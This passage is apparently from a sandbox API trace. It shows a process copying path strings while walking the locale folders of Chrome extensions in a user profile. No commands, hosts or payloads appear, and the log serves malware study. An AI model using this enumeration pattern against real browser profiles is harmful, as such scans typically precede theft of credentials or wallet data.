Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt" [0111.434] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo" [0111.435] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko" [0111.435] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn" [0111.436] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km" [0111.436] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka" [0111.436] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja" [0111.437] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw" [0111.437] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it" [0111.438] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is" [0111.438] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id" [0111.438] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy" [0111.439] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu" [0111.439] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr" [0111.440] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi" [0111.440] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu" [0111.441] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl" [0111.441] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA" [0111.441] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr" [0111.442] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil" [0111.442] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi" [0111.443] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa" [0111.443] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu" [0111.444] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et" [0111.444] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419" [0111.444] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es" [0111.445] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US" [0111.445] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB" [0111.446] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el" [0111.446] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de" [0111.446] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da" [0111.447] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs" [0111.447] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca" [0111.448] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn" [0111.448] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg" [0111.448] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az" [0111.449] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar" [0111.449] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am" [0111.450] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af" [0111.450] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap" [0111.450] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0" [0111.451] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 